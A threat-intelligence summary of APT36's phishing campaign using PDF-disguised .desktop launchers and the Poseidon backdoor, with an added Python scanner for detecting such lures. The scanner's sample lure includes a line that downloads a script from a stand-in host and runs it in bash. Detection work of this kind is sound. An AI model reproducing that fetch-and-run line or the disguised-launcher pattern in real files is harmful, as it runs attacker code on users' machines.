Indian Infrastructure Targeted with Desktop Lures and Poseidon Backdoor

NetmanageIT OpenCTI - opencti.netmanageit.com


SUMMARY:

APT36, a Pakistan-linked threat group, has expanded its operations to target Indian government and civilian infrastructure, including railways, oil and gas, and the Ministry of External Affairs. The group employs sophisticated phishing techniques and a novel payload strategy, using .desktop launcher files disguised as PDF documents to execute malicious scripts. Two attack variants were identified, one using a single command-and-control (C2) server and the other a redundant C2 setup. The Poseidon backdoor, built on the Mythic framework, is deployed for persistent access and lateral movement. Over 100 phishing domains impersonating Indian government organizations were discovered, primarily hosted by AlexHost. The campaign, active since early July 2025, poses a significant threat to the Indian public sector and critical infrastructure.
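The .desktop-as-PDF lure technique described in the summary, as an added detection example that is not part of the original report: a small scanner that parses a launcher file and flags the traits such a lure combines (a document-like Name, a document icon, an Exec line that runs an interpreter or downloader, and no visible terminal). The sample entries, file names and URL below are constructed for this example and are not indicators from the campaign.

```python
import configparser
import re

# Constructed sample of a .desktop lure of the kind the summary describes: the
# displayed name mimics a PDF while Exec runs a script. Made up for this example.
LURE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Circular_2025.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://example.invalid/p.sh | bash"
Terminal=false
"""
# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Exec=gedit %U
Terminal=false
"""
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
# Interpreters and downloaders that have no business in a "document" launcher.
SUSPICIOUS_EXEC = re.compile(r"\b(sh|bash|zsh|python3?|perl|curl|wget|base64)\b")

def parse_desktop(text):
    # .desktop files are INI-like; Exec carries '%' field codes (e.g. %U), so interpolation is off.
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp["Desktop Entry"] if cp.has_section("Desktop Entry") else None

def score_desktop(text):
    # Returns the list of lure indicators triggered by one .desktop file.
    entry = parse_desktop(text)
    if entry is None:
        return ["not-a-desktop-entry"]
    hits = []
    if entry.get("Name", "").strip().lower().endswith(DOC_EXTENSIONS):
        hits.append("name-mimics-document")
    if any(w in entry.get("Icon", "").lower() for w in ("pdf", "document", "office")):
        hits.append("document-icon")
    if SUSPICIOUS_EXEC.search(entry.get("Exec", "")):
        hits.append("exec-runs-interpreter-or-downloader")
        if entry.get("Terminal", "false").lower() == "false":
            hits.append("hidden-terminal")  # script runs with no visible window
    return hits

def is_likely_lure(text):
    # A real PDF viewer also carries a document icon; the combination of traits marks a lure.
    return len(score_desktop(text)) >= 2
```

Run it over files dropped into Downloads, the Desktop or `~/.local/share/applications` to surface launchers that pose as documents.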

OPENCTI LABELS:

phishing,india,infrastructure,poseidon,government impersonation,poseidon backdoor,mythic framework,desktop lures
